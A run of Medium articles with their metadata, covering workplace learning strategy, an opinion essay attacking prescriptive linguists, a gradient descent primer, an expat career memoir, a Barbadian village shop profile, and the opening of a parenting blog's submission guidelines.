This may sound daunting to an organization early on in taking a more strategic approach to learning, but it is recommended that you apply agile, iterative concepts by starting small and experiment, keeping future scalability in mind. It is critical to unite HR with business functions in a strategic partnership. Too often learning is viewed as an extra expense or something for HR or individual leaders to worry about rather than a top priority investment of the organization (e.g. technology). For example, in helping a major global pharmaceutical establish a new learning organization, we discovered that the company level learning strategy was articulated at a level too high to address unique needs for the targeted business unit. In response, a strategy, processes, org structure, and agile plan was created based on their unique needs. Senior leadership set the business strategy, HR established the workforce capabilities, and we built the learning strategy and operating model within the business to be closer to the need.
As with any major initiative, learning and development can’t take a “set it and forget it” approach. To be a real asset and achieve full ROI, learning needs to be woven into the fabric of daily work life, with a structured change approach and accountability to make the processes and learning stick.
2. Learning at the team level
The 70/20/10 learning model is nearly universally accepted at organizations acknowledging that only 10% of learning happens through formal instructional learning, another 20% comes through learning from others, and the bulk, 70%, comes from learning on the job. But too few organizations invest their time and money in a balanced way across these components — often focusing on the 10% instruction and letting the other 90% happen organically, informally, and thus more slowly. Learning focused at a more mid-level such as a team (or critical roles) offers a unique opportunity to help accelerate on the job and learning through others. Teams are where individuals spend most of their working time, and where they have the safe space to learn, make mistakes, and admit where they need help. Innovation requires creativity and risk-taking and thus the space to make mistakes. It is critical to create the psychological safety for this to feel normalized and accepted within working teams, where employees see that leaders and experts at all levels are continuously learning.
Creating targeted programs at a team or role level can be a low investment and rapid spin up, as they can tap into existing knowledge within the organization. Examples include: establishing or revitalizing communities of practice, accelerating higher numbers of technology certification for business workers, creating targeted learning paths for teams shifting to adopt new skills and ways of working, day to day coaching of agile teams and leadership teams, or encouraging formalized mentorship and sponsorship programs for underrepresented groups. Sometimes these efforts are spun up as passion projects by ambitious and/or desperate managers who realize the need. Unfortunately, organic, individually driven initiatives may lack staying power if leaders get busy or change roles or companies. Putting in structure and accountability enables programs to get off the ground faster, be sustained longer, and more efficiently utilize the busy time of in-house experts. It also enables an opportunity to explicitly factor in diversity (of thought and experience), another focus most organizations are finally waking up to also, to ensure employees are learning from diverse perspectives and backgrounds.
For example, we supported an organization to prepare for major organizational changes including high levels of departures, role changes and new hires. There was a huge risk of losing tacit institutional knowledge retained in the heads of long-tenured employees. A program was designed to manage knowledge transfer and incorporated approaches to build and sustain a learning and knowledge-sharing culture in day to day ways of working. This risk is present today for organizations who are dependent on heavy furloughs and maneuvering uncertainty. Simple practices like building in after-action reviews or retrospectives, sharing of learning goals and programs to train and encourage on feedback-giving, and regularly sharing experiences helps foster daily learning.
3. Learning at the individual level
Ultimately it is the individual learner that must be in the driver’s seat of their own learning and drive for innovation in daily life. Research has shown the ability to continuously learn new skills (learning agility) is critical to business success and a key indicator of leadership potential. Learning agility is demonstrated in 9 different ways:
· Flexibility (open to new ideas)
· Speed (acting on ideas quickly)
· Experimenting (trying new behaviors)
· Performance Risk Taking (seeking new activities/roles)
· Interpersonal Risk Taking (discussing differences with others)
· Collaborating
· Information Gathering
· Feedback Seeking, and
· Reflecting
These behaviors should be encouraged by organizations but require proactivity and motivation by individuals, especially in leadership roles.
However, there is significant room for improvement to promote and foster learning agility in action, especially related to risk-taking: Korn Ferry’s research found that companies with highly agile executives have 25% higher profit margins than their peer group; and that learning agility is a top predictor of high potential, but only 15% of the global workforce are highly agile.
In this ever changing COVID and competitive world, the reality is, we need to get comfortable being uncomfortable. Quoted in a 2011 talk, just before becoming CEO of IBM (the first woman), Ginni Rometty highlighted this importance of taking risks in order to grow. This is particularly true for women who are often socialized to be more risk-averse.
The shift in learning is increasingly to embrace personalized needs versus blanket learning solutions. Organizations can encourage fostering learning agility behaviors, and develop learning opportunities to tap into, but they will also need to drive individuals to find personal motivation to take action. Not just to take in new learning, but to apply that learning in action for deeper understanding and impact. Structured learning support in organizations can come in the form of self-directed learning, executive coaching, mentoring and sponsorship, and apprenticeship programs.
To put this into action, employees should set an explicit learning goal for themselves for this quarter, link it to broader goals that you find motivating, and find ways to make it stick (block time on your calendar for regular learning, identify specific next step action, and reach out to mentors and sponsors to discuss).
Wrapping it up
Notably, there are complexities and costs to broader-scale strategic learning support, but to remain competitive and drive more rapid innovation, organizations must increasingly treat learning as a strategic business imperative. There are plenty of ways to start small. If your organization, your team leaders, and you can embrace this, your organization will not only survive the crisis; it may innovate enough to thrive. If the pains of COVID have taught us anything, it is to seek out what really matters and what gives us fulfillment and meaning. An emphasis on continuous learning can also help us all seek out and perform work that we find meaningful and valuable, helping us reach for and realize our personal and organizational visions. | https://medium.com/slalom-business/need-to-innovate-faster-embrace-learning-as-a-business-imperative-9b4f8ff91fc3 | ['Amy Marshall'] | 2020-08-26 14:26:41.533000+00:00 | ['Innovation', 'Leadership', 'Business Strategy', 'Talent Management', 'Learning And Development'] |
Why Insane Linguists are Absurd | Preliminary Comments
Semiotics is the study of how a meaning (a definition) is developed. A sign is used by us to communicate a certain meaning of a reality which exists beyond this reality, while a symbol is used by us to communicate various meanings of a reality which all exist beyond this reality.
A sign only has a single meaning or definition; therefore, a sign can only be interpreted in a single way. A symbol has various meanings or definitions; therefore, a symbol can be interpreted in various ways. The same word may be either a sign or a symbol.
For example, the various definitions of the word, ‘impute’, are:
1. To attribute to a person; 2. To consider as the cause or source of; and 3. To ascribe a good or bad quality or condition.
The word, ‘impute’, may be used as a symbol so that its various meanings or definitions are all possible interpretations of this word, or this word may be used as a sign in which case only one of these meanings or definitions can be applied.
In his excellent book, Language in Thought and Action, S.I. Hayakawa has described the attempt of some people to use all words as signs as the ‘One Word, One Meaning’ Fallacy. I describe the attempt of other people to use all words as symbols as the ‘One Word, Various Meanings’ Fallacy.
People want to use all words as signs so that there is no uncertainty in what is meant or defined. These people fail to understand that uncertainty is necessary because we can’t know all there is to know. Other people want to use all words as symbols so that the mystery of our experience is never totally understood. These people fail to realize that mystery is never in danger of being totally understood because the infinite details of our experience can never be totally comprehended.
A physical reality is often used to refer to a psychological reality. Unfortunately, some semanticists make the mistake of thinking that this physical reality is a symbol when it is used to refer to a psychological reality. The fact is that when we refer a physical reality to a psychological reality we aren’t making this physical reality a symbol, but are simply confusing this physical reality with one of our psychological realities. These semanticists have committed the mistake of confusing this physical reality for a sign or symbol. Semanticists are fond of saying, ‘The word is not the thing!’ They also need to realize that the thing is not a sign or a symbol.
For example, some people use the reality of a physically lighted candle to refer to the experience of psychological wisdom. This is how the word, ‘enlightenment’, became the symbol for our religions’ various interpretations of psychological wisdom.
A physically lighted candle is obviously not the experience of psychological wisdom; therefore, physical reality is not our psychological reality, even though, as real psyches, we are related to our physical world by way of our psychological realities (our psychological worlds) and energy. Consequently, the word, ‘enlightenment’, is not the reality of our psychological wisdom, although all religions use the word, ‘enlightenment’, as a symbol to refer to their own ‘brand’ of wisdom.
Semantics is meant or defined by my Funk and Wagnalls’ Standard College Dictionary as:
1. Ling [Linguistics]. The study and meaning of speech forms, especially of the development and changes in meanings of words and word groups. 2. Logic. The relation between signs or symbols and what they signify or denote… 3. Loosely, verbal trickery.
Syntax is meant or defined by the same dictionary as:
1. The arrangement and interrelationships of words in phrases and sentences.
We reasonably arrange and interrelate the meanings or definitions of words and word groups in phrases or sentences. We also logically (unreasonably) arrange and interrelate the meaningless signs we signify and the meaningless symbols we denote in equations and formulas. Unfortunately, Aristotle thought the grammar of his Greek language corresponded to the principles, rules, or laws of logic so he treated the grammar of his language as a predetermined formula or an equation in which to insert his words, rather than realize that he was absolutely free to improvise his grammar and choose his words in accord with his needs. This attempt of Aristotle to force our free use of grammar into the straitjacket of logic’s principles, rules, or laws was his verbal trickery.
I contend that the attitude of a logician is dangerous to his (or her) psychological well-being, while the attitude of a linguist is usually more adapted to his psychological well-being, that is, if the linguist is not a logical linguist. I refer to the logical linguist as insane or malevolent because he has an insane or malevolent desire to enforce the principles, rules, or laws of logic, instead of a sane or benevolent desire to empower his needs. In other words, a logician is oriented to irresponsibly use power in such a way as to force compliance to his invented principles, rules and laws, rather than responsibly use power in his developed needs to motivate him to obtain his goals without the use of force. Consequently, this essay is concerned with semiotics because I will be showing how a person’s rational ultimate Truth is used by him to be the realistic foundation of his ability of arranging and interrelating the meanings or definitions of his words in improvised and meaningful phrases and sentences or how a person’s irrational ultimate ‘Truth’ is used by him to be the delusional foundation of his disability of arranging and interrelating signs and symbols, like numbers as well as words, in predetermined and meaningless formulas and equations.
The Sanity of Descriptive Grammar
A linguist’s approach to his language is related to whether he is using improvisation in his approach of descriptive grammar or using determination as his approach of prescriptive or normative grammar. A sane linguist uses descriptive grammar because she is reasonable. Descriptive grammar is a scientific approach to grammar because it is based on a speaker or writer’s choice of words which are improvisationally expressed by her in phrases and sentences which are in accord with her needs. An insane linguist uses prescriptive or normative grammar because she is unreasonably logical. Prescriptive or normative grammar is an unscientific approach to grammar because it is based on a speaker or writer’s choice of words which she rigidly attempts to fit into a predetermined logical formula or equation for speaking and writing which is in discord with her needs.
The insane linguist has no appreciation of poetry because poetry is reasonable, not logical. Poetry irritates the insane linguist because poetry is evidence that we need to improvise our expression of our words, while our use of principles, rules, or laws inhibits our ability to fulfil our need of improvisationally expressing our words.
That we don’t think about how to arrange our words in the sentences we speak when we are speaking freely is evidence that our use of descriptive grammar is spontaneous, while our use of prescriptive or normative grammar is the inhibition of our spontaneity and, thus, the inhibition of our ability to speak freely. When a person is not speaking freely, he is neurotic (if not psychopathically insane) because he is hiding his true motives or intentions behind his façade of principles, rules, and laws so that he will not have to reveal who he really is.
Aristotle thought that we should define our words by ‘class’ and ‘characteristic’, while modern researchers of scientism think we should define our words by their ‘operation’. An operational definition is based on what we need to do to experience the reality signified or symbolized by the word being defined. Unfortunately, Aristotle failed to understand and scientism’s modern researchers fail to understand that classes, characteristics, and operations are misleading if we use them as the basis of our ability to define because they are not the foundation by which we are actually defining our words.
The foundation by which a person defines all of his (or her) words is either his superstitious irrational ultimate ‘Truth’ or his realistic rational ultimate Truth.
Sanity, Insanity, and Oversensitivity
A sane person is a benevolent person because sanity is benevolence. An insane person is a malevolent person because insanity is malevolence.
People who suffer from oversensitivity (commonly and mistakenly referred to as psychosis) are not necessarily insane because, although they are deluded, they might not have a malevolent motive or intent to force others to comply with their demands; therefore, these mentally disrupted (not mentally ‘ill’) people are usually more at risk or in danger from a lot of so-called ‘normal’ people than they are risky or dangerous to them. The truth is that the terrible treatment they receive from so-called ‘normal’ people when they are acting strangely because of their delusions leads them to become dangerous to the bodies of normal people as well as their own bodies.
Mentally disrupted people differ from the normal population because their bodies usually have a faulty DNA sequence which predisposes their minds to become disrupted when they experience an intensely stressful situation. Mentally disrupted people are not abnormal because they are not mentally ‘ill’. Their bodies are ill because it is the faulty DNA sequence in their body that adversely affects their minds so that their minds become mentally disrupted and they experience delusions. Fortunately, medications can usually restore the chemical balance of a mentally disrupted person’s brain so that his mind is not adversely affected anymore and his mind ceases to be mentally disrupted.
The terrible treatment of mentally disrupted people is usually the result of the stigmatization of them as dangerous. Mentally disrupted people are no more dangerous than anyone else if they are treated with kindness and respect when they are deluded. Normal people who treat mentally disrupted people as if they were dangerous do not realize that they are stigmatizing them as dangerous because these normal people are afraid of their own insanity. Normal people are afraid that they are in danger from mentally disrupted people because mentally disrupted people remind these normal people that they are mentally disturbed. The danger most normal people fear is their own mental disturbance, not mentally disrupted people. Consequently, any normal person who treats a mentally disrupted person badly is simply afraid to face his or her own mental disturbance.
Irrational Ultimate ‘Truths’ and the Rational Ultimate Truth
Some linguists are not only insane, they are deluded, because their irrational ultimate ‘Truth’ is either predeterminism (all is destined to happen as it must), determinism (all is fated to happen as it must), or compatibilism (all is determined to happen, yet also happens with a degree of freedom). Insane linguists shun the rational ultimate Truth of libertarianism (all happens in absolute freedom by our absolutely free use of the Source and Activator’s Will in tandem with It, as well as by the Source and Activator’s absolutely free use of Its Will on Its own).
Insane linguists shun libertarianism because they are afraid to be absolutely free. They don’t want to admit that they are absolutely free because they fear taking total responsibility for how and who they need to be.
What makes insane linguists dangerous to everyone is that their minds are not disrupted by their bodies, like people who suffer from oversensitivity; rather, their minds are disturbed by their irresponsibility which is directly related to their irrational ultimate ‘Truth’. Of course, people who have absolute freedom as their rational ultimate Truth are not necessarily responsible because they may be using their absolute freedom as their excuse to be licentious, instead of their reason to be liberated.
The insane norm for people in our modern world is to delusionally believe in the principles, rules, or laws that their authorities have invented so that they are in conflict when they try to reconcile their irrational ultimate ‘Truth’ of predeterminism, determinism, or compatibilism with their unpredictable and continually changing actions and behaviours. Like the insane linguists from whom they have taken their lead, normal people usually fail to realize that their needs change with their situations or contexts; therefore they fail to understand that we all need to improvise our arrangement and interrelations of words in our phrases and sentences to suit our changing needs in different situations or contexts. Our words simply can’t be effectively arranged and interrelated if we use principles, rules, or laws to arrange and interrelate them because the principles, rules, or laws of grammar, like our societies’ behavioural principles, rules, or laws of conduct, are the same for every situation or context; therefore, the laws of our institutions of justice are just as unrealistically applied as the laws of the insane linguist’s prescriptive or normative grammar.
Some linguists are insane because they think we have a need for principles, rules, or laws. We don’t have a need for principles, rules, or laws because we are absolutely free in our use of our psychological worlds (our abilities and faculties); therefore, our use of our psychological worlds is not fated and destined by the principles, rules, or laws of a mythical ‘Creator’ who demands that we obey his principles, rules, or laws or else he will kill us. Nor is our use of our psychological worlds fated by the principles, rules, and laws which scientism’s researchers claim have always existed in Nature so that we are condemned to competitively struggle for survival, a competition thought by mortalists to be meaningless because they believe that we only survive as a postponement of death, not a transcendence of death.
We act and behave in relation to our needs, not in relation to the principles, rules, or laws that we make up to suit our whims. A sane linguist realizes that God is the Source as well as understands that the Source instinctively uses Its Will to evolve, grow, and develop all in accord with Its needs. A sane linguist understands that there are no principles, rules, or laws that were created by a Creator as well as understands that there are no principles, rules, or laws that have always existed in Nature. A sane linguist realizes that only our developed needs are effective, not our invented principles, rules, or laws. A sane linguist realizes that he is immortal because he understands that he was developed from and by the immortal Source; therefore, he understands that he has a need to develop wisdom, instead of concentrating all his attention on survival because the desire to survive is neurotic considering that we cannot die. After all, why desire to survive if you cannot die?
A linguist is able to begin his journey to wisdom by understanding that he is absolutely free in his expression of his emoting, imaging, imagining, sensing, perceiving, thinking, reasoning, understanding, intuiting, cognizing, recognizing, feeling, awaring, consciousing, remembering, anticipating, inventing, identifying, and naming. Although the goal of wisdom can be reached, the journey never ends because the linguist will always need to contend with his bottomless lack of knowledge so that he can continually deepen and expand his wisdom in relation to his always increasing knowledge.
It pays to be modest because we all lack omniscience (all-knowing and all-knowledge), nor will we ever be omniscient because we cannot be everywhere concurrently so that omniscience could be ours. Scientism’s researchers would have you believe that they are on the brink of omniscience because they are vain. These researchers suffer from the mistaken hypothesis that they can fix their principles, rules, or laws in an equation which they suppose they will be able to use to fix our continually changing Universe in an unchanging pattern. These researchers fail to understand that our infinite Universe does not occur in an unchanging pattern because our infinite Universe is not rigidly patterned by the lawful design of a Creator nor rigidly patterned by the laws of Nature because the Source is always instinctively using Its Will in this infinite Universal pattern so that this pattern is continually changing in accord with the needs of the Source.
The vanity of scientism’s insane researchers and insane linguists is shown by their failure to realize that we lack the knowledge of the infinite details of the Universe as well as the infinite details of the unbounded Cosmos-Heaven in which the infinite Universe exists. They fail to realize that the Universe is infinite as well as fail to understand that we shall always lack the knowledge of the Universal infinite details and the infinite details of the unbounded Cosmos-Heaven because infinity cannot be contained by our finite memory store.
These insane researchers and linguists are blind to the danger of their delusional belief that omniscience will soon be theirs. The danger is that their belief in their own impending omniscience prevents them from having the modesty necessary to question their own irrational ultimate ‘Truth’ of predeterminism, determinism, or compatibilism which are all attempts to escape from libertarianism. Consequently, they invented principles, rules, and laws to justify their belief in their irrational ultimate ‘Truth’ so that they would not have to accept the rational ultimate Truth of libertarianism.
These insane researchers and insane linguists do not want to understand that principles, rules, or laws have no objective reality except as words on paper. Instead, they use their belief that their actions and behaviours are determined by the Creator’s laws or by Nature’s laws so that they can rationalize that they had no choice in making weapons of mass destruction.
Somewhere in their development, these insane researchers and linguists lost their way because they settled for an illusory irrational ultimate ‘Truth’, instead of continuing to question what the ultimate Truth is until they had subjectively proven what the rational ultimate Truth is. These insane people have used their propaganda to convince the majority of people on earth that we are not absolutely free to use our abilities; therefore, we fail to understand that we are absolutely free in our ability to act in accord with our needs and sane desires, while guarding against our disabling tendency to licentiously use our abilities to act out our insane desires.
Insane people try to show that we are not absolutely free by referring to the fact that our bodies can be confined, restricted in their movements, and killed. They don’t want to understand that the person who is living his body and has life in his body is absolutely free in his use of his psychological world, even though he is only relatively free in his use of his objective body, because these insane people have decided in advance that they don’t want to be absolutely free.
Insane linguists don’t want to be absolutely free because they don’t want to be totally responsible for how and who they need to be; therefore, they are unreasonable because they don’t want to recognize that they made a decision to escape from their absolute freedom which is also why insane linguists are absurd as well as malevolent.
References
1. Darwin, C. 2019. On the Origin of Species by Means of Natural Selection. London, England: Arcturus Holdings Limited.
2. Fromm, E. 1969. Escape from Freedom. New York, New York: Avon Books.
3. Hayakawa, S. I. 1963. Language in Thought and Action. New York, New York: Harcourt Brace Jovanovich, Inc.
4. Hayakawa, S.I. 1943. The Use and Misuse of Language. New York, New York: Fawcett World Library.
5. Landau, S. I. 1968. Standard College Dictionary. Sidney I. Landau: Editor in Chief. New York, New York: Funk & Wagnalls.
6. Sartre, J. 1953. Being and Nothingness. Washington Square Press Edition. New York, New York: Pocket Books.
7. Strunk, Jr. W. and White, E.B. 1972. The Elements of Style. New York, New York: Macmillan Publishing Co., Inc. | https://medium.com/illumination-curated/why-insane-linguists-are-absurd-15422f838f98 | ['Daryl Mowat'] | 2020-11-24 14:42:56.397000+00:00 | ['Words', 'Truth', 'Linguistics', 'Logic', 'Grammar'] |
Gradient Descent — A Powerful Optimization tool for Data Scientist | Model Objective
Below we preface the article with a brief introduction to the structure of the model optimization problem (the notation is kept informal).
Suppose you have the following model:
ŷ = f(X, β), where f(·) is a function that takes the features X and the parameters β as inputs and returns a prediction. The parameter values (β) are not known to us, so we need to learn them from the data.
We want to find the best parameters (β) so that our predictions (ŷ) are close to the truth (y). To accomplish the task, we minimize a loss function: β̂ is the argument that minimizes the loss function L(·).
Minimizing the cost function
The structure of the loss function will depend on the problem you are trying to solve. Some popular loss functions are RMSE, RSS, and cross-entropy.
Note: Identifying the structure of the loss function is beyond the scope of the article.
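To make the loss functions above concrete, here is a small illustrative sketch (not from the original article); the data values below are invented purely for demonstration:

```python
import numpy as np

y = np.array([3.0, -0.5, 2.0, 7.0])      # ground-truth values
y_hat = np.array([2.5, 0.0, 2.0, 8.0])   # model predictions

# Residual sum of squares: sum of squared prediction errors
rss = np.sum((y - y_hat) ** 2)

# Root mean squared error: square root of the average squared error
rmse = np.sqrt(np.mean((y - y_hat) ** 2))

print(rss, rmse)  # 1.5 and roughly 0.612
```

Smaller values of either quantity mean the predictions sit closer to the truth, which is exactly what the minimization below targets.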
Direct Method
The direct method of minimizing a cost function is ideal because you can be certain that the answer you receive will be the optimal solution. Take for example the simple linear regression below.
ŷ = β₀ + β₁x
The objective of the model is to solve for the optimal solution to the β parameters. Linear regression has a well-defined closed-form solution for the loss function. The parameters β₀ and β₁ can be solved for directly.
β̂₁ = Σᵢ(xᵢ − x̄)(yᵢ − ȳ) / Σᵢ(xᵢ − x̄)²,  β̂₀ = ȳ − β̂₁x̄
But, not every loss function has a direct solution. Therefore, we need other methods to solve the parameter values.
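As a sketch of the direct method, the closed-form estimates for simple linear regression can be computed in a few lines of NumPy. This is illustrative code, not the article's; the toy data is generated from a known line (y = 2 + 3x, no noise) so the recovered parameters can be checked:

```python
import numpy as np

# Toy data drawn from a known linear relationship: y = 2 + 3x (no noise)
rng = np.random.default_rng(0)
x = rng.uniform(0, 10, size=100)
y = 2.0 + 3.0 * x

# Closed-form (direct) solution for simple linear regression:
#   beta1 = sum((x - mean(x)) * (y - mean(y))) / sum((x - mean(x))**2)
#   beta0 = mean(y) - beta1 * mean(x)
beta1 = np.sum((x - x.mean()) * (y - y.mean())) / np.sum((x - x.mean()) ** 2)
beta0 = y.mean() - beta1 * x.mean()

print(beta0, beta1)  # recovers 2.0 and 3.0 up to floating-point error
```

One pass over the data, no iteration, and the answer is guaranteed optimal for this loss.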
Approximation Method
Some formulas are too complex to solve directly for the unknown parameters. And even when a parameter can be solved for directly, the computation can take a long time on large problems. There are many approximation methods, but we will focus on gradient descent.
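A minimal gradient descent sketch for the same simple-regression loss (again illustrative, not the article's code; the learning rate and iteration count are arbitrary choices that happen to work well on this toy data):

```python
import numpy as np

def gradient_descent(x, y, lr=0.01, n_iter=10_000):
    """Approximate the MSE-minimizing line y = b0 + b1*x by gradient descent."""
    b0, b1 = 0.0, 0.0  # arbitrary starting guess
    n = len(x)
    for _ in range(n_iter):
        y_hat = b0 + b1 * x
        # Partial derivatives of the mean squared error w.r.t. b0 and b1
        grad_b0 = (-2.0 / n) * np.sum(y - y_hat)
        grad_b1 = (-2.0 / n) * np.sum((y - y_hat) * x)
        # Step in the direction opposite the gradient, scaled by the learning rate
        b0 -= lr * grad_b0
        b1 -= lr * grad_b1
    return b0, b1

# Same kind of toy data as before: generated from y = 2 + 3x
rng = np.random.default_rng(0)
x = rng.uniform(0, 10, size=100)
y = 2.0 + 3.0 * x

b0, b1 = gradient_descent(x, y)
print(b0, b1)  # approaches the direct solution (2.0, 3.0)
```

Because this loss is convex, the iterates approach the unique global minimum; for non-convex losses the same update rule can settle in a local minimum instead, which is the local-versus-global caveat discussed next.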
We deem the method an approximation because we are trying to get close to the true parameter values that will minimize a loss function. There can be times when the algorithm converges on a local solution instead of a global solution (more on that later). | https://towardsdatascience.com/gradient-descent-a-powerful-optimization-tool-for-data-scientist-89f48e8401c6 | ['Steven Loaiza'] | 2020-12-27 19:43:38.104000+00:00 | ['Python', 'Machine Learning', 'Algorithms', 'Optimization'] |
One Job Leads to the Next; the Importance of Having ‘a Foot in the Door’ | After about six months in my new job in Taipei it was Chinese New Year, in February. This meant that the office would close for a whole week!
I was hired locally and that meant that I had no right to annual leave in the first year. As a European, I found that unbelievable. How could anyone be productive in their job every single day for a whole year! Clearly, that way of thinking came from a cultural background where results, productivity and efficiency are valued much more highly than the number of hours sitting in the office.
“You are taking too much leave”
When I signed my contract, I was told that it was okay to take unpaid leave. I was fine with that because I was working for my professional fulfilment, not for financial reasons. However, when it came to asking for unpaid leave, it was met with reluctance. I had taken some unpaid leave around Christmas which was not welcomed with great enthusiasm. When I subsequently asked for an additional day to add to the Chinese New Year week because of the flight schedule to our planned holiday destination, my boss signed the form and gave it back to me with the comment: “You are taking too much leave”.
I felt bad. Clearly, I still hadn’t adjusted to the Chinese work ethic. But I needed that holiday. After six months living and working in Taipei, I was exhausted. All the excitement, anxieties and challenges of living in a new country, getting used to a totally different culture, working with only Taiwanese colleagues and making new friends had taken a lot of energy. I didn’t realise how tired I actually was until we arrived at our holiday destination, Boracay, an exotic car-free island in the Philippines.
Our hotel was a five-minute walk from the beach but the first three days we didn’t even make it to the beach. We had just about enough energy to walk the 20 meters from our hotel room to the pool and install ourselves on the sun loungers.
This was a perfect environment in which to think back on the previous six months of our lives
After three days of complete rest we started exploring the beach and the rest of the island. It was lovely and idyllic, completely different from the big city we were living in. The pace was nice and slow and everybody around us was just there to relax. This was a perfect environment in which to think back on the previous six months of our lives.
To my own surprise, I realised, on reflection, that my job was not very fulfilling. Wow, that was an insight that I hadn’t expected.
But it was true. I was hired in the executive search department to penetrate the Western community and find new clients. However, I was also expected to find the perfect candidates who were to be local Taiwanese people. That was where the problem lay. I did not have a network or speak the language, so it was very hard for me to find the right people. Our department assistant had helped me out several times when I called a potential candidate and the phone was answered by a family member who didn’t speak English. But I couldn’t rely on her for every call. The way the department worked was ‘every man (woman) for himself’ and there was no sharing of clients and candidates. There was no way I would be able to be effective and successful in this set-up.
I decided, during that holiday, that I wanted to do something else. But what?
“There is another option”
As this approach had been successful before, I decided to use my contacts. Back in the office I walked over to the audit department to see the person who had introduced me to my current job. Of course, he wanted to know how things were and I told him what I had discovered. Working in a similar environment, he completely understood and to my surprise he said: “There is another option”.
He told me that the firm’s Asia Pacific Regional office was housed in the same building. Something I hadn’t noticed because all the signs were in Chinese only and the regional office had very little to do with this local office. He hadn’t mentioned it before because his wife had worked there for a few months and had left in horror because the Regional head was a very difficult person to work for. He had wanted to protect me from him. Ah, sweet.
But I didn’t care. I would deal with him. My current job was not going to get any better and I had already decided that I wanted to leave. I asked my contact to introduce me and I was lucky that the regional head could fit me in within a few days.
I went downstairs to the fourth floor, feeling excited and hopeful. The regional office was tiny compared to the local office upstairs. It only occupied a corner of the building and there were six staff members, three Taiwanese and three Western. The Regional head was British and we had a very pleasant chat. Could I imagine him being difficult? Perhaps a little, but it was such a relief to be in a more Western environment.
The Regional head was interested in taking me on because his HR team of two was located in Hong Kong, which was inconvenient, and one of them was leaving. The fact that I was working in the local office impressed him. He knew that as an expat partner I didn’t need to work but I was clearly serious about my career. He asked me how much the local office was paying me and when I told him he shook his head. “Shocking” he said, which was music to my ears. And, yes, they also kept European standards with regards to annual leave. Hurray!
The elevator would take too long so I ran back up the stairs, full of excitement, straight into my boss’s office. I was still panting when I told him about my struggle to succeed in the role and that I had been offered a job in the regional office. He was perhaps a little insulted that I had decided to leave but he must have noticed my lack of success in finding candidates. He probably had more patience than I did.
It felt like I was coming home
I worked out my notice period and moved down, to the fourth floor. It felt like I was coming home. After six months of having worked in a completely Taiwanese environment, I had landed in a mixed office where the Anglo-Saxon business culture was leading. Clearly, that was much closer to home for me.
I never regretted my first six months in the local office. It was a great experience. I had taken the job and had accepted a low salary and if I hadn’t done that, I would never have found the next one. My job in the local office was a foot in the door. I was accepted as a serious member of the business community and that created opportunities.
I would work in the Asia Pacific office for the next three years. And, was the British boss a difficult person to work for? Oh, yes.
Wendela Elsen has been an expat partner for more than 20 years. She is originally from the Netherlands and has lived in Taiwan, Japan and now in the UK. She has been professionally active for most of that time in different capacities. She now works as a coach and helps expat partners find meaningful and fulfilling ways of using their professional skills and experiences, be it in paid work or otherwise. You can find out more about her work on www.openrabbit.com | https://medium.com/the-expat-chronicles/one-job-leads-to-the-next-the-importance-of-having-a-foot-in-the-door-89e1c68db824 | ['Wendela Elsen'] | 2021-01-19 13:49:19.433000+00:00 | ['Expat Life', 'Taiwan', 'Career Development', 'Careers', 'Expat'] |
Ah Bajan Ting: Old Time Village Shop | Ah Bajan Ting: Old Time Village Shop
The Legacy of The Hinkson Shop
By Krystal Penny Bowen
Originally published in The Barbados Advocate
The village shop was one of the three pillars of Barbadian society. Like the church and the school, it was a space for people to bond. It was also an essential service to the development of the community. But, the village shop is slowly dying and it is being replaced by the supermarket and minimart models of business. The village shops which have survived are usually still in their original spots and family-owned.
In the St. Stephen's Hill/Clevedale area, for almost fifty years, Hinkson's shop provided all the basic food supplies to a densely populated urban community. The Black Rock, St. Michael business, which opened in the early 1950s, sold meat (chicken, salted cod and pigtail), rice, flour, butter (served in paper and sold by the ounce), biscuits (Shirleys and Eclipse) stored in a tin, sweeties, soft drinks, and of course, rum.
On Friday, November 13, The Barbados Advocate visited the Hinkson's Shop to chat with owners, Heather Hinkson and her daughter, Sigmanda Hinkson. The once-grey shop is now bright baby pink, and the structure has not changed much since its early days. Sigmanda credits her ten-year-old daughter, Aarys, for recommending the new colour scheme for the business. The interior is nostalgic, as it has the traditional glass case to display the baked homemade goods. In the family, Sigmanda is the baker, and she always ensures the shop has fresh coconut cakes and, as it is November, Bajan conkies. She also makes pone, banana bread and sweet bread.
The Start of A Family Business
Heather explained that her father, Monty Hinkson, and mother, Phyllis Hinkson initially managed the shop. She said her father worked for the Transport Board and her mother would open the shop around 8 am to serve the people in the village. It was a team effort, her mother would take a break and her father would come in and assist with the customers' requests. In the household, Heather along with her siblings, Harcourt, Hazel, and cousin, Herbert also helped with the business.
A Change in Distribution
In the early days, items like sugar and flour were delivered in large crocus bags and distributed using a scoop. The shop has a scale on which these foods were weighed. Soft drinks were served in glass bottles. Today, there are plastic containers and bags for items like rice, flour, and sugar, and soft drinks now come in plastic or PET bottles, but the Hinkson family still has that scale. Unfortunately, it cannot be used, since the tray that held the rice or whatever was being weighed was damaged.
A Mini Museum
Sigmanda said that when children visit the shop, she and her mother show them other old-fashioned items and how they worked, much to their delight. For the older generation who remember the old-time shop, there is a wooden bench in the corner that holds pleasant memories. Heather said it was a place where people would sit and chat. She explained that in those days, there was no social media, and people came to the shop to hear the latest news.
"When you talk to the older folks from the district, they always say, " I remember spending many days on the bench...people still come in and sit down occasionally," said Heather.
Growing and Evolving
With both Monty and Phyllis gone, Heather and her daughter are keeping the Hinkson's legacy alive. But they have plans to help the business grow. They continue to sell the traditional food items and beverages but they are also selling fresh juices and other products which one may not normally see in the village shop. | https://medium.com/@krystalpennybowen/ah-bajan-ting-old-time-village-shop-2b55a69c8715 | ['Krystal Penny Bowen'] | 2020-11-27 10:30:29.329000+00:00 | ['History', 'Women In Business', 'Village Life', 'Barbados Culture', 'Bajan'] |
How to Write for Home Sweet Home | How to Write for Home Sweet Home
Guidelines and how to submit your work
Photo by Dustin Lee on Unsplash
Welcome to Home Sweet Home!
Before submitting your work, please take the time to read the guidelines below. You may also find our FAQ section helpful.
About Us
Our little family. Photo by Laura Fox.
HSH is run by myself and my husband, David Fox. We have a daughter called Imogen, but we call her Immy for short.
I have mental health problems and write about my experiences as a mother who is recovering from postnatal depression and healing from a traumatic childhood. I hope I can help other parents with similar experiences feel less alone.
David has cerebral palsy and writes about parenting with a physical disability. Not only does this help other parents with disabilities feel less alone, but it also challenges the stereotypes around people living with a physical disability.
About Home Sweet Home
We are a parenting publication and welcome stories on parenting experiences. Whether you’re a parent to be, a single parent, co-parenting, have adopted children, grandchildren, step-children…we want to hear from you!
We realise not everyone is a parent but still have great stories to tell. If you want to write about your hopes for when you become a parent or about family in general, you are very welcome to.
Submission Guidelines
Stories must be tagged with at least one of the following:
Family
Parenting
